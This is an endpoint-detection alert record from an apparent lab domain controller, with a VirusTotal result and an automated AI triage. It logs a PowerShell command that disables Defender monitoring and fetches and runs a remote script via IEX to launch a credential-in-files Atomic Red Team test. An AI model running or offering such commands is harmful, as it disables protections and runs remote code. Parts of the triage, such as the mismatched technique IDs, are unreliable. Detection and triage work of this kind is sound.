{
  "author": "_soteria-rules-edr-926e2197-189b-4d89-9675-c8993933dc9a[bulk][segment]",
  "cat": "00023-WIN-PS_Invoke_Expression_Usage",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1552.001 -CheckPrereqs ; Invoke-AtomicTest T1552.001 -GetPrereqs ; Invoke-AtomicTest T1552.001 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 238641152,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldDCD7.tmp.bat T1552.001 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4489216,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 9164,
        "THIS_ATOM": "2eddc57635edafdc772cd43169c2a851",
        "THREADS": 3,
        "TIMESTAMP": 1774364752869,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 9164,
      "PROCESS_ID": 2584,
      "THREADS": 31,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "6741a4a8-eb86-4026-9e1a-0da01f2f48fe",
      "event_time": 1774364753471,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3256,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "2eddc57635edafdc772cd43169c2a851",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "0faf1760d8bf36ee150fa36d69c2a853"
    }
  },
  "detect_id": "51b11059-6b35-4170-a839-057a69c2a854",
  "detect_mtd": {
    "description": "Invoke-Expression is a Powershell commandlet that evaluates and executes a string as a command. Adversaries and frameworks such as Empire use this technique to pull encoded implants from websites as strings and execute them. This detector looks for the use of Invoke-Expression in the commandline of a Powershell process.",
    "falsepositives": [
      "Invoke-Expression used in combination with NuGet, Chef, Puppet, or other administrator like functions is all normal behavior."
    ],
    "references": [
      "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-6",
      "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf",
      "https://www.fireeye.com/content/dam/fireeye-www/global/en/solutions/pdfs/wp-lazanciyan-investigating-powershell-attacks.pdf",
      "https://isc.sans.edu/diary/Malicious+Powershell+Script+Dissection/24282"
    ],
    "tags": [
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364756730,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364753\u0026selected=0faf1760d8bf36ee150fa36d69c2a853",
  "namespace": "general",
  "priority": 2,
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "6741a4a8-eb86-4026-9e1a-0da01f2f48fe",
    "event_time": 1774364753471,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3256,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "2eddc57635edafdc772cd43169c2a851",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "0faf1760d8bf36ee150fa36d69c2a853"
  },
  "rule_tags": [
    "ext:soteria-rules-edr",
    "attack.t1059.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.WIN-PS_Invoke_Expression_Usage",
  "ts": 1774364756000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.875,
  "false_positive_reason": null,
  "investigation_questions": [
    "What other processes were spawned during this session?",
    "Were there any network connections established to external IP addresses?",
    "Was the SYSTEM account used for legitimate administrative tasks recently?",
    "Are there any scheduled tasks or registry modifications associated with this execution?"
  ],
  "ioc_analysis": "The process is running legitimate system binaries (powershell.exe) but executing highly suspicious commands including disabling real-time monitoring, using Invoke-Expression with IEX to fetch code from a raw GitHub URL, and invoking Atomic Red Team tests. The command line explicitly shows malicious intent to bypass security controls.",
  "iocs_extracted": [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
    "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1",
    "Set-MpPreference -DisableRealtimeMonitoring $true"
  ],
  "mitre_techniques": [
    "T1552.001",
    "T1059.004",
    "T1567.001"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Isolate the host immediately to prevent lateral movement",
    "Block outbound connections to raw.githubusercontent.com",
    "Review and disable Set-MpPreference commands in future detections",
    "Analyze PowerShell execution logs for additional malicious activity",
    "Check for persistence mechanisms installed by Atomic Red Team"
  ],
  "risk_score": 85,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a high-confidence malicious PowerShell execution by the SYSTEM account attempting to disable security controls and download an offensive tool from Red Canary\u0027s Atomic Red Team repository.\n\n**IOC Analysis:** The process is running legitimate system binaries (powershell.exe) but executing highly suspicious commands including disabling real-time monitoring, using Invoke-Expression with IEX to fetch code from a raw GitHub URL, and invoking Atomic Red Team tests. The command line explicitly shows malicious intent to bypass security controls.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.8\nThe detection event involves a PowerShell process from C:\\Windows\\System32, which is a legitimate system binary, but the command line shows suspicious activities such as changing execution policy, installing NuGet, disabling real-time monitoring, and downloading/installing Atomic Red Team tools, indicating potential malicious intent.\n\n**IOC Analysis:** The FILE_PATH is a known Windows system binary in C:\\Windows\\System32, making it likely benign on its own. However, the command line includes actions that are commonly associated with malware, such as modifying system security settings and downloading scripts from external sources, raising suspicion. The signed hash supports the binary\u0027s legitimacy, but the context suggests possible evasion techniques.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 80% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.8,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}